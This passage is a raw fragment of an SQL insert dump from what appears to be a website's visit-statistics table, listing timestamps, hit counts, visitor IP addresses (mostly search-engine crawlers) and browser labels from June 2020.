34,1592097737,1,1,0,0,'178.154.200.97','other'),(513335,1592097824,1,1,0,0,'207.46.13.214','other'),(513336,1592098390,8,8,0,0,'185.11.82.228','other'),(513337,1592098415,1,1,0,0,'66.249.64.38','chrome'),(513338,1592098424,2,2,0,0,'66.249.70.69','chrome'),(513339,1592098494,1,1,0,0,'66.249.70.70','chrome'),(513340,1592098607,1,1,0,0,'66.249.64.36','chrome'),(513341,1592099109,2,2,0,0,'157.55.39.59','other'),(513342,1592099460,3,3,0,0,'66.249.70.70','chrome'),(513343,1592099668,1,1,0,0,'66.249.70.69','chrome'),(513344,1592099689,8,8,0,0,'185.11.82.228','other'),(513345,1592099789,1,1,0,0,'66.249.64.33','chrome'),(513346,1592099903,1,0,1,0,'66.249.70.72',''),(513347,1592100842,1,1,0,0,'157.55.39.52','other'),(513348,1592100991,8,8,0,0,'185.11.82.228','other'),(513349,1592101233,1,1,0,0,'66.249.70.72','chrome'),(513350,1592101540,1,1,0,0,'91.197.220.219','chrome'),(513351,1592101590,2,2,0,0,'157.55.39.75','other'),(513352,1592102163,1,1,0,0,'66.249.64.33','chrome'),(513353,1592102250,3,3,0,0,'66.249.70.70','chrome'),(513354,1592102251,1,1,0,0,'178.154.200.225','other'),(513355,1592102302,8,8,0,0,'185.11.82.228','other'),(513356,1592103197,3,3,0,0,'157.55.39.75','other'),(513357,1592103442,3,3,0,0,'66.249.70.69','chrome'),(513358,1592103635,8,8,0,0,'185.11.82.228','other'),(513359,1592103955,1,1,0,0,'66.249.70.72','chrome'),(513360,1592103972,1,1,0,0,'66.249.70.70','chrome'),(513361,1592105007,3,3,0,0,'66.249.70.72','chrome'),(513362,1592105117,8,8,0,0,'185.11.82.228','other'),(513363,1592105772,1,1,0,0,'66.249.64.33','chrome'),(513364,1592106015,1,1,0,0,'66.249.70.69','chrome'),(513365,1592106137,1,1,0,0,'66.249.70.72','chrome'),(513366,1592106722,8,8,0,0,'185.11.82.228','other'),(513367,1592106816,1,0,1,0,'66.249.70.70',''),(513368,1592106992,2,2,0,0,'35.184.250.107','chrome'),(513369,1592107210,1,1,0,0,'178.154.200.236','other'),(513370,1592107424,1,1,0,0,'66.249.70.69','chrome'),(513371,1592107589,1,1,0,0,'66.249.70.70','chrome'),(513372,1592108041,1,1,0,0,'66.249.64.38','chrome'),(513373,1592108303,1,1,0,0,'8.29.198.25','other'),(513374,1592108316,8,8,0,0,'185.11.82.228','other'),(513375,1592108329,1,1,0,0,'8.29.198.26','other'),(513376,1592109120,2,2,0,0,'66.249.70.69','chrome'),(513377,1592109938,8,8,0,0,'185.11.82.228','other'),(513378,1592109981,1,0,1,0,'66.249.70.70',''),(513379,1592110233,1,1,0,0,'62.205.134.182','other'),(513380,1592110390,1,1,0,0,'66.249.64.36','chrome'),(513381,1592110829,1,1,0,0,'17.58.99.7','other'),(513382,1592110993,1,1,0,0,'66.249.70.69','chrome'),(513383,1592111085,1,1,0,0,'66.249.70.72','chrome'),(513384,1592111094,1,1,0,0,'66.249.70.70','chrome'),(513385,1592111601,8,8,0,0,'185.11.82.228','other'),(513386,1592111696,2,2,0,0,'157.55.39.75','other'),(513387,1592112332,1,1,0,0,'157.55.39.59','other'),(513388,1592112491,1,1,0,0,'182.22.27.17','other'),(513389,1592112676,1,1,0,0,'66.249.64.38','chrome'),(513390,1592113059,2,2,0,0,'66.249.70.70','chrome'),(513391,1592113363,1,1,0,0,'66.249.70.69','chrome'),(513392,1592113365,8,8,0,0,'185.11.82.228','other'),(513393,1592113885,1,1,0,0,'66.249.64.38','chrome'),(513394,1592113910,1,1,0,0,'207.46.13.214','other'),(513395,1592114191,1,1,0,0,'178.154.200.222','other'),(513396,1592114215,2,2,0,0,'66.249.70.70','chrome'),(513397,1592114633,2,2,0,0,'66.249.70.69','chrome'),(513398,1592115123,1,0,1,0,'66.249.70.72',''),(513399,1592115278,8,8,0,0,'185.11.82.228','other'),(513400,1592115286,2,2,0,0,'66.249.70.72','chrome'),(513401,1592116502,1,1,0,0,'66.249.70.72','chrome'),(513402,1592116615,1,1,0,0,'66.249.70.69','chrome'),(513403,1592116674,2,2,0,0,'207.46.13.214','other'),(513404,1592116764,1,1,0,0,'66.249.64.33','chrome'),(513405,1592117187,8,8,0,0,'185.11.82.228','other'),(513406,1592117324,1,1,0,0,'178.154.200.222','other'),(513407,1592117363,1,1,0,0,'17.58.99.7','other'),(513408,1592117541,1,1,0,0,'157.55.39.75','other'),(513409,1592117799,1,1,0,0,'66.249.70.70','chrome'),(513410,1592118102,1,1,0,0,'66.249.70.72','chrome'),(513411,1592118128,1,1,0,0,'66.249.64.38','chrome'),(513412,1592118450,1,1,0,0,'66.249.64.33','chrome'),(513413,1592119077,1,1,0,0,'66.249.70.69','chrome'),(513414,1592119125,1,1,0,0,'8.29.198.26','other'),(513415,1592119157,1,1,0,0,'8.29.198.25','other'),(513416,1592119199,8,8,0,0,'185.11.82.228','other'),(513417,1592119349,1,1,0,0,'45.136.108.44','other'),(513418,1592119996,1,1,0,0,'131.220.6.152','chrome'),(513419,1592120652,1,1,0,0,'157.55.39.75','other'),(513420,1592121144,8,8,0,0,'185.11.82.228','other'),(513421,1592121190,1,1,0,0,'66.249.70.70','chrome'),(513422,1592121597,2,2,0,0,'157.55.39.52','other'),(513423,1592121639,2,2,0,0,'157.55.39.75','other'),(513424,1592121662,2,2,0,0,'207.46.13.214','other'),(513425,1592122016,2,2,0,0,'66.249.70.72','chrome'),(513426,1592122348,2,2,0,0,'188.143.169.29','other'),(513427,1592123167,8,8,0,0,'185.11.82.228','other'),(513428,1592123288,1,1,0,0,'66.249.64.36','chrome'),(513429,1592123531,1,1,0,0,'66.249.70.72','chrome'),(513430,1592124000,3,3,0,0,'66.249.70.70','chrome'),(513431,1592124061,1,1,0,0,'66.249.70.69','chrome'),(513432,1592124328,1,1,0,0,'207.46.13.214','other'),(513433,1592124511,1,1,0,0,'157.55.39.75','other'),(513434,1592124673,1,1,0,0,'45.77.100.93','other'),(513435,1592125154,8,8,0,0,'185.11.82.228','other'),(513436,1592125191,2,2,0,0,'66.249.70.72','chrome'),(513437,1592125322,3,3,0,0,'66.249.70.69','chrome'),(513438,1592126122,1,1,0,0,'66.249.70.70','chrome'),(513439,1592127178,8,8,0,0,'185.11.82.228','other'),(513440,1592127352,3,3,0,0,'34.210.175.42','chrome'),(513441,1592127384,2,2,0,0,'66.249.70.72','chrome'),(513442,1592127426,1,1,0,0,'66.249.70.69','chrome'),(513443,1592127496,1,1,0,0,'66.249.70.70','chrome'),(513444,1592128931,8,8,0,0,'185.11.82.228','other'),(513445,1592129053,1,1,0,0,'66.249.70.72','chrome'),(513446,1592129200,1,1,0,0,'66.249.64.36','chrome'),(513447,1592129952,1,1,0,0,'8.29.198.25','other'),(513448,1592129983,1,1,0,0,'8.29.198.26','other'),(513449,1592130316,1,1,0,0,'13.66.139.0','other'),(513450,1592130548,1,1,0,0,'66.249.70.72','chrome'),(513451,1592130913,1,1,0,0,'66.249.70.70','chrome'),(513452,1592131046,8,8,0,0,'185.11.82.228','other'),(513453,1592131070,1,1,0,0,'66.249.70.69','chrome'),(513454,1592131240,1,1,0,0,'109.74.154.72','chrome'),(513455,1592131418,1,1,0,0,'66.249.64.33','chrome'),(513456,1592131613,1,1,0,0,'178.154.200.220','other'),(513457,1592131675,1,1,0,0,'213.180.203.140','other'),(513458,1592131922,1,1,0,0,'66.249.70.72','chrome'),(513459,1592132027,2,0,2,0,'66.249.70.69',''),(513460,1592132608,3,3,0,0,'207.46.13.214','other'),(513461,1592133194,8,8,0,0,'185.11.82.228','other'),(513462,1592133712,11,11,0,0,'62.210.78.76','other'),(513463,1592134167,2,2,0,0,'207.46.13.214','other'),(513464,1592134409,1,1,0,0,'157.55.39.52','other'),(513465,1592134666,1,1,0,0,'157.55.39.75','other'),(513466,1592134809,1,1,0,0,'66.249.70.70','chrome'),(513467,1592135115,1,1,0,0,'37.192.37.76','chrome'),(513468,1592135343,8,8,0,0,'185.11.82.228','other'),(513469,1592136383,1,1,0,0,'207.46.13.214','other'),(513470,1592137344,2,2,0,0,'157.55.39.52','other'),(513471,1592137412,1,1,0,0,'157.55.39.59','other'),(513472,1592137434,2,2,0,0,'207.46.13.214','other'),(513473,1592137483,8,8,0,0,'185.11.82.228','other'),(513474,1592137655,1,1,0,0,'178.154.200.222','other'),(513475,1592138653,1,1,0,0,'66.249.70.70','chrome'),(513476,1592139143,1,1,0,0,'157.55.39.75','other'),(513477,1592139166,1,1,0,0,'178.154.200.222','other'),(513478,1592139461,1,1,0,0,'66.249.64.36','chrome'),(513479,1592139649,8,8,0,0,'185.11.82.228','other'),(513480,1592140006,1,1,0,0,'157.55.39.59','other'),(513481,1592140290,1,1,0,0,'213.87.157.104','chrome'),(513482,1592140782,1,1,0,0,'8.29.198.26','other'),(513483,1592140811,1,1,0,0,'8.29.198.25','other'),(513484,1592140917,1,1,0,0,'178.154.200.69','other'),(513485,1592141148,2,2,0,0,'66.249.70.69','chrome'),(513486,1592141563,8,8,0,0,'185.11.82.228','other'),(513487,1592141584,1,1,0,0,'157.55.39.52','other'),(513488,1592142175,1,1,0,0,'207.46.13.214','other'),(513489,1592143288,3,3,0,0,'157.55.39.75','other'),(513490,1592143535,1,1,0,0,'178.154.200.196','other'),(513491,1592143666,8,8,0,0,'185.11.82.228','other'),(513492,1592144139,1,0,1,0,'66.249.70.69',''),(513493,1592144169,1,1,0,0,'157.55.39.59','other'),(513494,1592144341,1,1,0,0,'207.46.13.214','other'),(513495,1592144448,1,1,0,0,'157.55.39.52','other'),(513496,1592145892,8,8,0,0,'185.11.82.228','other'),(513497,1592146436,1,1,0,0,'157.55.39.75','other'),(513498,1592148010,8,8,0,0,'185.11.82.228','other'),(513499,1592148426,1,1,0,0,'66.249.70.72','chrome'),(513500,1592148602,1,1,0,0,'37.73.75.15','chrome'),(513501,1592149070,1,1,0,0,'207.46.13.214','other'),(513502,1592149952,1,1,0,0,'157.55.39.75','other'),(513503,1592150113,8,8,0,0,'185.11.82.228','other'),(513504,1592150514,1,1,0,0,'178.154.200.216','other'),(513505,1592151093,1,1,0,0,'157.55.39.52','other'),(513506,1592151428,1,1,0,0,'157.55.39.59','other'),(513507,1592151611,2,2,0,0,'8.29.198.27','other'),(513508,1592152260,8,8,0,0,'185.11.82.228','other'),(513509,1592152269,2,2,0,0,'207.46.13.214','other'),(513510,1592153022,1,1,0,0,'192.99.13.88','other'),(513511,1592153823,1,1,0,0,'157.55.39.75','other'),(513512,1592153826,1,1,0,0,'185.234.218.239','firefox'),(513513,1592154227,1,1,0,0,'66.249.70.70','chrome'),(513514,1592154391,8,8,0,0,'185.11.82.228','other'),(513515,1592155172,1,1,0,0,'157.55.39.52','other'),(513516,1592155313,1,1,0,0,'207.46.13.214','other'),(513517,1592155627,1,0,1,0,'66.249.70.72',''),(513518,1592156439,1,1,0,0,'91.196.178.121','chrome'),(513519,1592156647,8,8,0,0,'185.11.82.228','other'),(513520,1592156870,1,1,0,0,'66.249.70.72','chrome'),(513521,1592157505,2,2,0,0,'66.249.70.70','chrome'),(513522,1592157807,1,1,0,0,'194.61.24.94','other'),(513523,1592157818,1,1,0,0,'66.249.70.69','chrome'),(513524,1592158041,2,2,0,0,'157.55.39.52','other'),(513525,1592158202,1,1,0,0,'92.253.234.20','chrome'),(513526,1592158425,1,1,0,0,'157.55.39.75','other'),(513527,1592158887,8,8,0,0,'185.11.82.228','other'),(513528,1592159496,1,1,0,0,'66.249.70.72','chrome'),(513529,1592160115,1,1,0,0,'157.55.39.75','other'),(513530,1592160396,1,1,0,0,'207.46.13.214','other'),(513531,1592160669,1,1,0,0,'157.55.39.52','other'),(513532,1592160837,1,1,0,0,'92.253.234.20','chrome'),(513533,1592161105,1,1,0,0,'66.249.70.69','chrome'),(513534,1592161128,8,8,0,0,'185.11.82.228','other'),(513535,1592161709,3,3,0,0,'157.55.39.75','other'),(513536,1592162437,2,2,0,0,'8.29.198.26','other'),(513537,1592162939,2,2,0,0,'66.249.70.70','chrome'),(513538,1592163755,1,1,0,0,'207.46.13.214','other'),(513539,1592164463,1,1,0,0,'213.180.203.62','other'),(513540,1592164569,8,8,0,0,'185.11.82.228','other'),(513541,1592164670,1,1,0,0,'66.249.70.72','chrome'),(513542,1592164740,1,1,0,0,'66.249.64.33','chrome'),(513543,1592166198,1,1,0,0,'173.252.111.4','other'),(513544,1592166199,1,1,0,0,'173.252.111.23','other'),(513545,1592166322,1,1,0,0,'66.249.64.38','chrome'),(513546,1592166657,1,1,0,0,'157.55.39.75','other'),(513547,1592166954,1,1,0,0,'94.153.1.39','chrome'),(513548,1592167305,1,1,0,0,'66.249.70.72','chrome'),(513549,1592167313,1,1,0,0,'66.249.70.70','chrome'),(513550,1592167906,8,8,0,0,'185.11.82.228','other'),(513551,1592167908,1,1,0,0,'157.55.39.52','other'),(513552,1592168422,1,1,0,0,'207.46.13.214','other'),(513553,1592168520,1,1,0,0,'213.180.203.16','other'),(513554,1592169505,3,3,0,0,'66.249.70.69','chrome'),(513555,1592169620,1,1,0,0,'91.196.178.13','chrome'),(513556,1592170045,1,1,0,0,'157.55.39.75','other'),(513557,1592171377,8,8,0,0,'185.11.82.228','other'),(513558,1592171689,1,1,0,0,'157.55.39.75','other'),(513559,1592172401,2,2,0,0,'66.249.70.70','chrome'),(513560,1592172861,1,1,0,0,'66.249.64.36','chrome'),(513561,1592173264,1,1,0,0,'8.29.198.27','other'),(513562,1592173302,1,1,0,0,'8.29.198.25','other'),(513563,1592173572,1,1,0,0,'157.55.39.52','other'),(513564,1592173653,3,3,0,0,'66.249.70.70','chrome'),(513565,1592173966,1,1,0,0,'66.249.64.36','chrome'),(513566,1592174531,1,1,0,0,'66.249.70.69','chrome'),(513567,1592174678,8,8,0,0,'185.11.82.228','other'),(513568,1592175419,1,1,0,0,'207.46.13.214','other'),(513569,1592177335,1,1,0,0,'79.137.130.24','chrome'),(513570,1592177628,1,1,0,0,'157.55.39.52','other'),(513571,1592177940,2,2,0,0,'66.249.70.69','chrome'),(513572,1592177955,8,8,0,0,'185.11.82.228','other'),(513573,1592178444,1,1,0,0,'66.249.70.72','chrome'),(513574,1592178655,2,2,0,0,'66.249.70.70','chrome'),(513575,1592178834,1,1,0,0,'157.55.39.52','other'),(513576,1592178906,1,1,0,0,'62.205.134.182','other'),(513577,1592179038,1,1,0,0,'207.46.13.214','other'),(513578,1592179392,1,1,0,0,'66.249.64.36','chrome'),(513579,1592179618,1,1,0,0,'66.249.70.70','chrome'),(513580,1592179685,1,1,0,0,'213.180.203.16','other'),(513581,1592179951,1,1,0,0,'157.55.39.87','other'),(513582,1592181231,2,2,0,0,'207.46.13.214','other'),(513583,1592181296,8,8,0,0,'185.11.82.228','other'),(513584,1592181888,2,1,1,0,'66.249.70.69',''),(513585,1592182078,1,1,0,0,'157.55.39.52','other'),(513586,1592182419,1,0,1,0,'66.249.70.70',''),(513587,1592182914,1,1,0,0,'104.45.194.130','chrome'),(513588,1592183305,1,1,0,0,'178.154.200.92','other'),(513589,1592184094,2,2,0,0,'8.29.198.26','other'),(513590,1592184294,1,1,0,0,'66.249.70.72','chrome'),(513591,1592185110,8,8,0,0,'185.11.82.228','other'),(513592,1592185179,1,1,0,0,'66.249.70.70','chrome'),(513593,1592185472,1,1,0,0,'207.46.13.214','other'),(513594,1592186728,1,1,0,0,'66.249.64.38','chrome'),(513595,1592186736,1,1,0,0,'66.249.70.72','chrome'),(513596,1592187223,1,1,0,0,'66.249.64.33','chrome'),(513597,1592187814,1,1,0,0,'66.249.70.70','chrome'),(513598,1592188275,1,1,0,0,'66.249.70.69','chrome'),(513599,1592188763,1,1,0,0,'66.249.70.72','chrome'),(513600,1592189113,8,8,0,0,'185.11.82.228','other'),(513601,1592189544,1,1,0,0,'66.249.64.33','chrome'),(513602,1592190040,1,1,0,0,'66.249.70.69','chrome'),(513603,1592192675,7,7,0,0,'66.249.70.69','chrome'),(513604,1592192710,1,1,0,0,'66.249.70.70','chrome'),(513605,1592192823,1,1,0,0,'66.249.70.72','chrome'),(513606,1592193601,8,8,0,0,'185.11.82.228','other'),(513607,1592194922,1,1,0,0,'8.29.198.25','other'),(513608,1592194966,1,1,0,0,'8.29.198.26','other'),(513609,1592195327,2,2,0,0,'66.249.70.69','chrome'),(513610,1592195661,1,1,0,0,'157.55.39.75','other'),(513611,1592196303,1,1,0,0,'81.110.98.116','other'),(513612,1592196596,1,1,0,0,'157.55.39.75','other'),(513613,1592196681,1,1,0,0,'62.205.134.182','other'),(513614,1592197580,1,1,0,0,'66.249.70.69','chrome'),(513615,1592198458,1,1,0,0,'157.55.39.52','other'),(513616,1592198625,1,1,0,0,'66.249.70.72','chrome'),(513617,1592198634,8,8,0,0,'185.11.82.228','other'),(513618,1592198779,1,1,0,0,'5.101.156.177','chrome'),(513619,1592198945,1,1,0,0,'51.68.11.227','chrome'),(513620,1592199068,1,1,0,0,'95.133.6.227','chrome'),(513621,1592199765,2,2,0,0,'192.99.4.151','other'),(513622,1592200348,1,1,0,0,'178.154.200.119','other'),(513623,1592200431,1,1,0,0,'213.180.203.16','other'),(513624,1592200913,1,1,0,0,'91.196.177.46','chrome'),(513625,1592201318,1,1,0,0,'91.196.178.87','chrome'),(513626,1592202365,1,1,0,0,'46.211.51.241','chrome'),(513627,1592202440,1,1,0,0,'66.249.70.70','chrome'),(513628,1592202626,1,1,0,0,'157.55.39.52','other'),(513629,1592202875,1,1,0,0,'91.196.178.87','chrome'),(513630,1592203548,3,2,1,0,'66.249.70.69',''),(513631,1592203606,2,2,0,0,'51.68.11.207','chrome'),(513632,1592203716,1,1,0,0,'94.153.9.25','chrome'),(513633,1592203791,1,1,0,0,'89.46.105.229','chrome'),(513634,1592204123,1,1,0,0,'213.180.203.142','other'),(513635,1592204423,1,1,0,0,'66.249.70.70','chrome'),(513636,1592204466,1,1,0,0,'66.249.70.72','chrome'),(513637,1592204575,8,8,0,0,'185.11.82.228','other'),(513638,1592205134,1,1,0,0,'91.196.178.181','chrome'),(513639,1592205446,1,1,0,0,'103.28.39.55','chrome'),(513640,1592205756,1,1,0,0,'8.29.198.26','other'),(513641,1592205796,1,1,0,0,'8.29.198.27','other'),(513642,1592205818,3,3,0,0,'157.55.39.75','other'),(513643,1592206197,2,2,0,0,'66.249.70.69','chrome'),(513644,1592206620,1,1,0,0,'131.220.6.152','chrome'),(513645,1592207583,1,1,0,0,'91.196.178.170','firefox'),(513646,1592207623,4,4,0,0,'66.249.70.69','chrome'),(513647,1592207786,1,1,0,0,'82.207.62.50','chrome'),(513648,1592208080,1,1,0,0,'82.207.63.138','chrome'),(513649,1592208112,1,1,0,0,'91.203.167.152','chrome'),(513650,1592209523,1,1,0,0,'17.58.99.7','other'),(513651,1592209746,1,1,0,0,'91.196.178.73','chrome'),(513652,1592210046,1,1,0,0,'91.196.178.87','chrome'),(513653,1592210858,1,1,0,0,'66.249.70.69','chrome'),(513654,1592211399,1,1,0,0,'82.207.63.138','chrome'),(513655,1592211528,1,1,0,0,'91.196.178.65','chrome'),(513656,1592211850,1,1,0,0,'91.196.150.154','chrome'),(513657,1592212167,3,3,0,0,'51.68.11.207','chrome'),(513658,1592212218,1,1,0,0,'91.196.178.73','firefox'),(513659,1592212292,1,1,0,0,'66.249.64.38','chrome'),(513660,1592212641,1,0,1,0,'66.249.70.69',''),(513661,1592213251,1,1,0,0,'157.55.39.52','other'),(513662,1592213308,1,1,0,0,'3.134.111.16','chrome'),(513663,1592213778,1,1,0,0,'51.68.11.215','chrome'),(513664,1592213890,8,8,0,0,'185.11.82.228','other'),(513665,1592213961,1,1,0,0,'45.86.201.196','chrome'),(513666,1592214239,1,1,0,0,'95.133.151.46','chrome'),(513667,1592214335,1,1,0,0,'91.196.178.89','chrome'),(513668,1592214406,1,1,0,0,'66.249.70.70','chrome'),(513669,1592214592,2,2,0,0,'157.55.39.52','other'),(513670,1592214983,1,1,0,0,'91.196.178.169','chrome'),(513671,1592215797,1,1,0,0,'66.249.70.72','chrome'),(513672,1592216101,2,2,0,0,'213.180.203.16','other'),(513673,1592216585,1,1,0,0,'8.29.198.26','other'),(513674,1592216627,1,1,0,0,'8.29.198.25','other'),(513675,1592217406,1,1,0,0,'107.178.194.195','chrome'),(513676,1592217409,1,1,0,0,'107.178.194.198','chrome'),(513677,1592217765,1,1,0,0,'109.74.154.72','chrome'),(513678,1592218156,1,1,0,0,'199.127.56.236','chrome'),(513679,1592218249,1,1,0,0,'66.249.70.72','chrome'),(513680,1592218275,3,3,0,0,'66.249.70.70','chrome'),(513681,1592218660,3,3,0,0,'95.217.203.80','other'),(513682,1592218700,1,1,0,0,'207.46.13.214','other'),(513683,1592218901,1,1,0,0,'66.249.70.69','chrome'),(513684,1592218926,2,2,0,0,'94.20.62.62','chrome'),(513685,1592219240,1,1,0,0,'66.249.70.70','chrome'),(513686,1592219344,1,1,0,0,'66.249.70.72','chrome'),(513687,1592219695,1,1,0,0,'157.55.39.52','other'),(513688,1592220075,1,1,0,0,'66.249.64.38','chrome'),(513689,1592220362,2,2,0,0,'66.249.70.72','chrome'),(513690,1592220431,1,1,0,0,'51.77.52.160','chrome'),(513691,1592220616,1,1,0,0,'45.136.108.44','other'),(513692,1592220684,1,1,0,0,'66.249.70.69','chrome'),(513693,1592220758,1,1,0,0,'157.55.39.52','other'),(513694,1592221000,1,1,0,0,'112.213.89.97','chrome'),(513695,1592221102,2,2,0,0,'66.249.70.70','chrome'),(513696,1592221374,1,1,0,0,'91.196.177.46','chrome'),(513697,1592222125,2,2,0,0,'66.249.70.70','chrome'),(513698,1592222449,2,2,0,0,'66.249.64.33','chrome'),(513699,1592222536,2,2,0,0,'91.208.99.2','chrome'),(513700,1592222763,2,2,0,0,'52.158.252.119','chrome'),(513701,1592222788,1,1,0,0,'66.249.70.72','chrome'),(513702,1592222814,1,1,0,0,'66.249.70.69','chrome'),(513703,1592223040,2,2,0,0,'66.249.70.70','chrome'),(513704,1592223412,8,8,0,0,'185.11.82.228','other'),(513705,1592224371,1,1,0,0,'66.249.64.36','chrome'),(513706,1592224379,1,1,0,0,'66.249.70.69','chrome'),(513707,1592224527,2,2,0,0,'66.249.70.72','chrome'),(513708,1592224553,1,1,0,0,'66.249.64.33','chrome'),(513709,1592224658,1,1,0,0,'93.125.99.83','chrome'),(513710,1592224819,1,1,0,0,'157.55.39.52','other'),(513711,1592225341,1,1,0,0,'213.180.203.16','other'),(513712,1592225618,1,1,0,0,'66.102.9.164','chrome'),(513713,1592226027,1,1,0,0,'178.154.200.222','other'),(513714,1592226205,3,2,1,0,'66.249.70.72',''),(513715,1592226327,4,2,2,0,'66.249.70.69',''),(513716,1592226493,1,1,0,0,'66.249.64.33','chrome'),(513717,1592226541,1,1,0,0,'157.55.39.52','other'),(513718,1592226653,2,1,1,0,'66.249.70.69',''),(513721,1592226654,5,4,1,0,'66.249.70.69',''),(513722,1592226704,3,3,0,0,'66.249.70.69','chrome'),(513723,1592226756,1,1,0,0,'91.196.178.87','chrome'),(513724,1592226792,1,1,0,0,'178.154.200.220','other'),(513725,1592226946,1,1,0,0,'157.55.39.75','other'),(513726,1592227421,2,2,0,0,'8.29.198.25','other'),(513727,1592227510,2,2,0,0,'66.249.70.70','chrome'),(513728,1592227805,1,1,0,0,'66.249.70.69','chrome'),(513729,1592228162,1,1,0,0,'66.249.64.38','chrome'),(513730,1592228727,1,1,0,0,'66.249.70.70','chrome'),(513731,1592229231,1,1,0,0,'112.213.89.97','chrome'),(513732,1592229415,1,1,0,0,'103.31.232.173','chrome'),(513733,1592230059,2,2,0,0,'66.249.70.70','chrome'),(513734,1592230127,1,1,0,0,'66.249.70.69','chrome'),(513735,1592230772,2,2,0,0,'206.189.13.23','chrome'),(513736,1592230805,1,1,0,0,'51.68.11.195','chrome'),(513737,1592230983,1,1,0,0,'207.46.13.214','other'),(513738,1592231198,1,1,0,0,'144.217.255.176','chrome'),(513739,1592231849,1,1,0,0,'66.249.70.72','chrome'),(513740,1592231875,1,1,0,0,'66.249.70.70','chrome'),(513741,1592231995,3,3,0,0,'157.55.39.75','other'),(513742,1592232338,2,2,0,0,'157.55.39.52','other'),(513743,1592232468,1,1,0,0,'178.154.200.222','other'),(513744,1592232938,1,1,0,0,'66.249.70.70','chrome'),(513745,1592233535,2,2,0,0,'66.249.70.69','chrome'),(513746,1592233722,1,1,0,0,'94.103.95.137','chrome'),(513747,1592233885,1,1,0,0,'93.172.88.184','other'),(513748,1592233928,2,2,0,0,'66.249.70.72','chrome'),(513749,1592234896,1,1,0,0,'66.249.64.38','chrome'),(513750,1592234901,2,2,0,0,'66.249.64.33','chrome'),(513751,1592235101,1,1,0,0,'207.46.13.214','other'),(513752,1592235214,2,2,0,0,'66.249.70.70','chrome'),(513753,1592235895,1,1,0,0,'37.52.17.185','chrome'),(513754,1592235936,2,2,0,0,'66.249.70.69','chrome'),(513755,1592236188,2,2,0,0,'66.249.70.72','chrome'),(513756,1592236344,1,1,0,0,'66.249.70.70','chrome'),(513757,1592236465,1,1,0,0,'13.66.139.0','other'),(513758,1592236872,1,1,0,0,'91.209.11.236','other'),(513759,1592237040,1,1,0,0,'66.249.70.69','chrome'),(513760,1592237224,8,8,0,0,'185.11.82.228','other'),(513761,1592237278,1,1,0,0,'37.52.17.185','chrome'),(513762,1592238270,2,2,0,0,'8.29.198.26','other'),(513763,1592238284,1,1,0,0,'66.249.70.69','chrome'),(513764,1592238496,1,1,0,0,'194.61.24.94','other'),(513765,1592238892,1,1,0,0,'92.113.157.152','chrome'),(513766,1592239035,2,2,0,0,'157.55.39.52','other'),(513767,1592240695,1,1,0,0,'157.55.39.52','other'),(513768,1592241231,1,1,0,0,'66.249.70.70','chrome'),(513769,1592241301,1,1,0,0,'66.249.70.69','chrome'),(513770,1592241395,1,1,0,0,'37.52.17.185','chrome'),(513771,1592241518,2,2,0,0,'66.249.70.72','chrome'),(513772,1592241780,1,1,0,0,'66.249.64.33','chrome'),(513773,1592241901,1,1,0,0,'91.196.178.62','chrome'),(513774,1592243323,1,1,0,0,'157.55.39.52','other'),(513775,1592243782,1,1,0,0,'207.46.13.214','other'),(513776,1592244464,1,1,0,0,'157.55.39.52','other'),(513777,1592244609,1,1,0,0,'66.249.70.69','chrome'),(513778,1592244675,1,1,0,0,'95.179.253.64','chrome'),(513779,1592244712,2,2,0,0,'178.255.72.122','chrome'),(513780,1592245125,2,2,0,0,'173.252.111.15','other'),(513781,1592245126,1,1,0,0,'173.252.111.11','other'),(513783,1592245878,1,1,0,0,'66.249.70.69','chrome'),(513784,1592246020,1,1,0,0,'178.154.200.222','other'),(513785,1592246146,3,3,0,0,'173.233.84.210','chrome'),(513786,1592246291,2,2,0,0,'46.37.171.183','chrome'),(513787,1592246368,1,1,0,0,'37.52.17.185','chrome'),(513788,1592247288,1,1,0,0,'91.232.157.84','firefox'),(513789,1592247417,1,1,0,0,'66.249.70.69','chrome'),(513790,1592247548,1,0,1,0,'66.249.64.38',''),(513791,1592247618,1,1,0,0,'178.154.200.236','other'),(513792,1592247766,1,1,0,0,'176.14.194.221','chrome'),(513793,1592248198,2,2,0,0,'112.213.89.59','chrome'),(513794,1592248773,1,1,0,0,'17.58.99.7','other'),(513795,1592248992,1,1,0,0,'95.217.115.62','other'),(513796,1592249104,1,1,0,0,'8.29.198.25','other'),(513797,1592249133,1,1,0,0,'8.29.198.27','other'),(513798,1592249367,1,1,0,0,'88.155.131.62','chrome'),(513799,1592250064,1,1,0,0,'207.46.13.214','other'),(513800,1592250189,1,1,0,0,'157.55.39.52','other'),(513801,1592250858,2,2,0,0,'94.20.62.62','chrome'),(513802,1592251065,1,1,0,0,'89.46.106.215','chrome'),(513803,1592251456,1,1,0,0,'207.46.13.214','other'),(513804,1592251558,1,1,0,0,'66.249.70.72','chrome'),(513805,1592251943,1,0,1,0,'66.249.64.38',''),(513806,1592252461,1,1,0,0,'89.46.104.194','chrome'),(513807,1592252644,3,3,0,0,'66.249.70.69','chrome'),(513808,1592252826,8,8,0,0,'185.11.82.228','other'),(513809,1592252875,1,1,0,0,'80.85.156.55','chrome'),(513810,1592253496,2,2,0,0,'95.213.141.126','opera'),(513811,1592253556,1,1,0,0,'66.249.70.72','chrome'),(513812,1592253618,1,1,0,0,'66.249.70.70','chrome'),(513813,1592253976,1,1,0,0,'185.49.20.76','chrome'),(513814,1592254043,1,1,0,0,'178.154.200.222','other'),(513815,1592254140,3,3,0,0,'45.248.68.69','chrome'),(513816,1592254604,1,1,0,0,'66.249.70.70','chrome'),(513817,1592255167,2,0,2,0,'66.249.70.69',''),(513818,1592255274,1,1,0,0,'66.249.70.69','chrome'),(513819,1592255434,2,2,0,0,'18.237.215.185','chrome'),(513820,1592255617,1,1,0,0,'66.249.64.38','chrome'),(513821,1592255674,1,1,0,0,'77.75.150.134','other'),(513822,1592255833,1,1,0,0,'103.31.232.173','chrome'),(513823,1592257202,2,2,0,0,'91.208.99.2','chrome'),(513824,1592257223,2,2,0,0,'132.148.35.84','chrome'),(513825,1592257234,2,2,0,0,'178.208.83.18','chrome'),(513826,1592258062,1,1,0,0,'207.46.13.214','other'),(513827,1592258627,2,2,0,0,'185.182.56.85','chrome'),(513828,1592258703,2,2,0,0,'208.109.10.223','chrome'),(513829,1592259938,1,1,0,0,'8.29.198.27','other'),(513830,1592259965,1,1,0,0,'8.29.198.25','other'),(513831,1592260465,2,2,0,0,'51.68.11.203','chrome'),(513832,1592260634,3,3,0,0,'157.55.39.75','other'),(513833,1592260678,1,1,0,0,'66.249.70.72','chrome'),(513834,1592260826,1,1,0,0,'66.249.70.70','chrome'),(513835,1592261750,1,1,0,0,'207.46.13.214','other'),(513836,1592261881,2,2,0,0,'80.237.132.90','chro